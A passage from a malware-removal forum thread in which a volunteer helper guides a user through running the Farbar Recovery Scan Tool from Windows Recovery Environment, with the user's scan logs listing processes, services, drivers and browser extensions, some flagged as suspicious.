Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:18:22.725
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:52:06.834
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:17:14.808
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-10 20:22:12.478
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-09 19:37:48.069
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-08 20:23:26.515
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-07 20:25:01.994
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 47%
Total physical RAM: 3982.68 MB
Available physical RAM: 2091.84 MB
Total Virtual: 4686.68 MB
Available Virtual: 2875.01 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:145.79 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:2.89 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#26 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 12 June 2018 - 01:17 PM

Hi Dan,
 
Your laptop has a nasty infection which is able to render the contents of my Fixlist script ineffective. That's why I emphasized that you need to prepare your thumb drive and keep it away from your sick laptop until after you open Command Prompt in Recovery Environment (RE). Re-read Post #21 and notice the sequence of instructions.

  • Now please delete the copy of Fixlist.txt from your clean PC and from your thumb drive.
  • Download the copy of Fixlist.txt in Post #21 onto your thumb drive, but don't insert the thumb drive into the sick laptop yet.
  • Now open Command Prompt in Recovery Environment as described in Post #21.
  • Only after Command Prompt is open in Recovery Environment insert the thumb drive into the sick laptop and continue with the instructions in Post #21.

It might help you do these steps in the required sequence if you print the instructions from Post #21 and check them off as each step is completed.
 
In your next reply...

  • Copy and paste the entire contents of Fixlog.txt into the body of your message.
  • Copy and post the entire contents of FRST.txt and Addition.txt into the body of your message.
  • Please tell me which programs you tried to run. Did they run successfully?
  • Were you able to connect to BleepingComputer? Which browser did you use?
  • Tell me about any unexpected symptoms you saw.

Thank you,

Ray




#27 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 12 June 2018 - 01:48 PM

Hi Ray,

I did do that in that order and only inserted the thumb drive after Command Prompt, but let me do the process over again. I will be back tomorrow.

Best,

Dan



#28 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 12 June 2018 - 10:53 PM

Hi Dan,

If you have already done the steps in my Post #26, then send me the logs. If you have not already done them, then don't bother with the Fixlist.txt file for now. We can get useful info from your laptop by just doing a scan in Recovery Environment. The following instructions are similar but they don't use the Fixlist.txt file and they use the Scan function in the tool instead of the Fix function. Version 06.06.2018 of FRST64.exe on your thumb drive is already up-to-date.

Keep the thumb drive out of the laptop until after you enter Recovery Environment and open Command Prompt below.

Open Command Prompt

Now insert the thumb drive into the sick laptop.

Scan with FRST64.exe and obtain one log

  • In the Command Prompt window, type Notepad and press Enter.
  • From the notepad menu, press File > Open then navigate to your thumb drive and choose All Files.
  • Right click FRST64 and click Run as administrator.
  • Click Scan.
  • The result of the scan will appear in a file called FRST.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Insert the thumb drive into your clean PC. Then Copy and paste FRST.txt into your reply.

If you restart in normal boot, don't expect much improvement because we still need to run the Fixlist script in a later post. The scan, however, should disable the worst component of the infection so that our next run will not be blocked. Your laptop is still very vulnerable because we have not applied most of the repair and we have not reinstalled any antivirus protection yet.

In your next reply...

  • Copy and post the entire contents of FRST.txt into the body of your message.

Thank you,

Ray




#29 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 13 June 2018 - 06:09 PM

Hi Ray,

This is Dan.

Here are the fix and addition txt logs from doing that Command Prompt again.

I'm also going to do what you said in the last reply and will be back with the txt logs tomorrow.

For now, here's the FRST txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (12-06-2018 20:43:02)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\dahhService\dahhService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
() C:\Program Files\Gramblr\gramblr.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
() C:\Program Files (x86)\ASUS\Splendid\my_intel_cpp_x64.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusVibe\AsusVibe2.0.exe
() C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe" 
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)
 
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
